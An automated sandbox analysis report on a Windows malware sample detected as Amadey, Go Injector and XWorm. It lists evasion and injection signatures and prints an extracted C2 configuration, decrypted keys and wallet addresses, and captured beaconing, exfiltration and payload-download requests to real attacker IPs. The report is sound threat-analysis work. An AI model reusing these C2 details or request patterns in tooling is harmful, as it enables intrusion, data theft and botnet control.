Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1517696
MD5: a8900c1f255a11688131b9bf0860a730
SHA1: 6067ef527264302b42dd3bf4eca7c5a0f63649be
SHA256: 59c6eacafceee2fbbff6f0c025f5fdfb358a8b50ba3a58ff2047491c17227a70
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Go Injector, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Go Injector
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
XWorm Malware with wide range of capabilities ranging from RAT to ransomware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.16/Jo89Ku7d/index.php(x8 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpnd Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/rstxdhuj.exe5867 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpQ Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php00342001 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpRNAM Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/rstxdhuj.exe Avira URL Cloud: Label: phishing
Source: http://103.130.147.211/Files/5.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Avira: detection malicious, Label: HEUR/AGEN.1358803
Source: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe Avira: detection malicious, Label: HEUR/AGEN.1358803
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe Avira: detection malicious, Label: HEUR/AGEN.1358803
Found malware configuration
Source: 00000000.00000003.1419233067.00000000051B0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe ReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: 188.190.10.161
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: 4444
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: <IlwAYl63V65*l#>
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: <Xwormmm>
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: XWorm V5.6
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: USB.exe
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: bc1qyrkl2d6y5szrmqdhc4tv5jjavgyrtlcu072d73
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: 0xCF1f6F491C7C6345B2139C0bB9204e64f37BD4e9
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: TVc65vYbkKfbEAqihVbyZuSVVagPux7c7h
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbMg` source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003599000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2027391076.0000000005B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ((.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003599000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2027391076.0000000005B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbx source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.000000000101B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @Ho.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.000000000101B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059B41A8h 10_2_059B3F18
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059B41A8h 10_2_059B3F08
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_059B2EF0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_059B2EE8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059B41A8h 10_2_059B424D
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059C7770h 10_2_059C7580
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059C7770h 10_2_059C7572
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059CEBA0h 10_2_059CEAE8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059CEBA0h 10_2_059CEAE0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 10_2_05BAD148

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49709 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.8:49709
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49710 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.8:49711 -> 103.130.147.211:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.215.113.16
Yara detected Generic Downloader
Source: Yara match File source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 25 Sep 2024 04:08:04 GMTContent-Type: application/octet-streamContent-Length: 986112Last-Modified: Tue, 24 Sep 2024 18:05:31 GMTConnection: keep-aliveETag: "66f2ff6b-f0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 27 31 f2 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 02 0f 00 00 08 00 00 00 00 00 00 82 21 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 21 0f 00 57 00 00 00 00 40 0f 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 01 0f 00 00 20 00 00 00 02 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 05 00 00 00 40 0f 00 00 06 00 00 00 04 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0f 00 00 02 00 00 00 0a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 21 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 50 d9 0e 00 d8 47 00 00 03 00 00 00 e7 00 00 06 94 55 00 00 bc 83 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 28 d4 00 00 06 2a 00 00 00 3e 03 02 28 18 00 00 0a 04 6f 56 00 00 06 26 2a 2e 73 0c 00 00 06 80 01 00 00 04 2a 1b 30 04 00 88 01 00 00 01 00 00 11 28 19 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 33 07 28 07 00 00 06 2d 03 16 6a 2a 7e 01 00 00 04 25 13 0b 28 1c 00 00 0a 7e 01 00 00 04 6f 0d 00 00 06 0c 08 16 6a 40 38 01 00 00 28 1d 00 00 0a 13 08 73 1e 00 00 0a 0b 11 08 6f 1f 00 00 0a 13 07 de 11 26 11 08 6f 20 00 00 0a 73 21 00 00 0a 13 07 de 00 11 07 6f 22 00 00 0a 0d 09 2c 07 09 8e 69 2d 02 14 0d 09 2c 07 07 09 6f 23 00 00 0a 07 28 24 00 00 0a 11 07 6f 25 00 00 0a 6f 26 00 00 0a 6f 23 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 28 09 00 00 06 13 05 28 19 00 00 06 13 06 07 11 05 1e 63 d2 6f 27 00 00 0a 07 11 06 d2 6f 27 00 00 0a 07 11 05 1f 18 63 d2 6f 27 00 00 0a 07 11 06 1e 63 d2 6f 27 00 00 0a 07 11 05 d2 6f 27 00 00 0a 07 11 06 1f 18 63 d2 6f 27 00 00 0a 07 11 05 1f 10 63 d2 6f 27 00 00 0a 07 11 06 1f 10 63 d2 6f 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 25 Sep 2024 04:08:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 24 Sep 2024 09:14:12 GMTETag: "2fef6a01-622d9edbf71c1"Accept-Ranges: bytesContent-Length: 804219393Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 36 5b 01 00 66 8f 03 00 2e 0a 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 10 9a 03 00 04 00 00 d4 f4 8f 03 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 8d 03 4e 00 00 00 00 a0 8d 03 38 14 00 00 00 e0 8d 03 7a 52 00 00 00 c0 79 03 64 80 09 00 00 00 00 00 00 00 00 00 00 40 8e 03 60 c9 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ab 79 03 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c a4 8d 03 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 35 5b 01 00 10 00 00 00 36 5b 01 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 10 ba 85 00 00 50 5b 01 00 bc 85 00 00 3a 5b 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 d0 a9 98 01 00 10 e1 01 00 aa 98 01 00 f6 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 64 80 09 00 00 c0 79 03 00 82 09 00 00 a0 79 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 60 0c 00 00 00 50 83 03 00 0e 00 00 00 22 83 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 00 2e 0a 00 00 60 83 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 4e 00 00 00 00 90 8d 03 00 02 00 00 00 30 83 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 38 14 00 00 00 a0 8d 03 00 16 00 00 00 32 83 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 c0 8d 03 00 02 00 00 00 48 83 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 d0 8d 03 00 02 00 00 00 4a 83 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 7a 52 00 00 00 e0 8d 03 00 54 00 00 00 4c 83 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 60 c9 0b 00 00 40 8e 03 00 ca 0b 00 00 a0 83 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 38 41 35 34 32 43 39 46 45 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F8A542C9FEFD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000342001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /Files/5.exe HTTP/1.1Host: 103.130.147.211
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.130.147.211 103.130.147.211
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MYREPUBLIC-AS-IDPTEkaMasRepublikID MYREPUBLIC-AS-IDPTEkaMasRepublikID
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 103.130.147.211:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0020BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 9_2_0020BD60
Source: global traffic HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /Files/5.exe HTTP/1.1Host: 103.130.147.211
Source: global traffic DNS traffic detected: DNS query: google.com
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: 5[1].exe.9.dr String found in binary or memory: http://.css
Source: 5[1].exe.9.dr String found in binary or memory: http://.jpg
